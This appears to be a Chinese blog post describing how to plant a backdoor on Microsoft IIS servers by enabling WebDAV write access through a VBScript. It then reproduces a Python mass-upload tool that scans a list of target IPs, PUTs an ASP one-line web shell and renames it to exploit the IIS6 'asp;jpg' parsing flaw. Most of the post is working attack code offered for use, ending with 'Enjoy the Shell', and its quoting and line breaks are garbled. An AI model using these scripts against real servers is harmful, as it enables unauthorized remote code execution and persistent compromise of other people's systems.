IIS一种鲜为人知的留后门方式

  今天记录的就是人为制造WebDAV验证上传的洞洞,也就是俗称的“IIS写权限的利用”.

  要将其作为“后门”来使用,我觉得应该符合我上面所说的两点中的后者,所以最好是选择一个爬虫或者一般的web相对路径爆破所难以抓到的路径,来开启Write权限,当然打开WebDAV扩展之后,提交Option的HTTP VERB是很容易知道你有PUT和MOVE权限的。而手动开启这些配置你可能需要打开IIS管理器,在GUI下操作,但是hacking当然是do all in shell最装13啦。所以不妨用vbs来实现整个过程。

  for the IIS6

  Option Explicit

  Dim objIIsWebService

  Set objIIsWebService = GetObject(“IIS://localhost/W3SVC”)

  objIIsWebService.EnableWebServiceExtension “WEBDAV”

  objIIsWebService.SetInfo

  Dim objIIsWebSite

  Set objIIsWebSite = GetObject(“IIS://localhost/W3SVC/1/ROOT”)

  objIIsWebSite.AccessRead = True

  objIIsWebSite.AccessSource = True

  objIIsWebSite.AccessWrite = True

  objIIsWebSite.EnableDirBrowsing = True

  objIIsWebSite.SetInfo

  这里需要解释的ADSI方式操作中 IIS://ComputerName/Service/Website/Directory 这种形式所表示的路径,其中website可以通过IIS管理器的identifier来获得,或者使用注入IISSPY这里小脚本,或者使用IIS自带vbs脚本来获得。如默认站点的绝对路径为 C:inetpubwwwroot ===> IIS://localhost/W3SVC/1/ROOT 则其根目录下的darkray路径对应为 IIS://localhost/W3SVC/1/ROOT/darkay.事实上你可以构造一个比较完美的脚本,建立一个非默认路径的映射比如放到D:
eycler下等,更多可以参考《使用脚本对IIS进行深入管理》& http://blog.sina.com.cn/s/blog_9840bb7f0100xyxl.html。

  剩下就是利用了,可以用老兵前辈的IISPUT小工具来弄,或者burp发包,再或者curl在shell展示下酷炫,这里引用一下写好的py脚本

  http://www.subhashdasyam.com/2011/04/python-iis-scanner-with-auto-uploading.html

  #!/usr/bin/python

  import socket,re,urllib,urllib2,os,sys

  def options():

  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  sock.connect((t_IP,t_port))

  req = “OPTIONS / HTTP/1.1

  req += “Host: ” + t_IP + “

  req += “Connection: close

  req += “

  #print req

  sock.send(req)

  data = sock.recv(1024)

  sock.close()

  r1 = re.compile(‘DAV’)

  result = r1.findall(data)

  if result == []:

  print “On bad…the web DAV is not open.

  else:

  print “WA HAHA LET US CHECK MORE time”

  return None

  def put():

  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  sock.connect((t_IP,t_port))

  text = ‘<%execute request("hacker")%>‘

  print “File content:
” + text

  file_length = len(text)

  req = “PUT /” + ‘temp003.txt’ +” HTTP/1.1

  req += “Connection: close

  req += “Host: ” + t_IP + “

  req += “Content-Type: text/xml; charset=’utf-8′

  req += “Content-Length: ” + str(file_length) +”

  req += text + “

  sock.send(req)

  data = sock.recv(1024)

  sock.close()

  r2 = re.compile(‘OK’)

  result = r2.findall(data)

  if result == []:

  print “On bad…the web is not wirrten.

  else:

  print “OK code uploaded”

  print “
code here ” + ‘http://’+t_IP+’/'+’temp003.txt’

  def move():

  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  sock.connect((t_IP,t_port))

  req = “MOVE /” + ‘temp003.txt’ +” HTTP/1.1

  req += “Host: ” + t_IP + “

  req += “Destination: http://” + t_IP +’/'+ ‘temp003.asp;jpg’+”

  sock.send(req)

  data = sock.recv(1024)

  sock.close()

  r3 = re.compile(‘asp’)

  result = r3.findall(data)

  if result == []:

  print “On bad…the web is not wirrten.

  else:

  print “
_shell :D and check RESULT.TXT
http://” + t_IP +’/'+ ‘temp003.asp;jpg’+”

  temp=”http://” + t_IP +’/'+ ‘temp003.asp;jpg’

  os.system(‘echo’+’ ‘+ temp +’ >>RESULT.txt’)

  t_port = 80

  print “===============Auto Upload Shell==================”

  print “
[1] Check the Vulnerability”

  #IP=raw_input(“enter your target ip like 1.1.1.0/24:”)

  #inp = raw_input(“enter your choice:”)

  #if inp == ’1′:

  # options()

  # if options() is None:

  # put()

  # move()

  IP=raw_input(“enter your txt position like C:1.txt:”)

  f=open(IP,’r')

  lines=f.readlines()

  #b = ‘nmap’+’ ‘+’–open ‘+”+’-p 80 ‘ + ” + IP

  #print b +’
’+'Now go for find the dork server’

  #a = str(os.popen(b).readlines())

  #r1 = re.compile(“d*.d*.d*.d*”)

  #ip = r1.findall(a)

  ips=[]

  #if ip==[]:

  # sys.exit()

  for x in lines:

  x=x.strip()

  ips.append(x)

  for y in ips:

  t_IP = y

  try:

  print ‘now scan the ‘+y

  options()

  if options() is None:

  put()

  move()

  except:

  continue

  print “Enjoy the Shell”

 

发表评论

邮箱地址不会被公开。 必填项已用*标注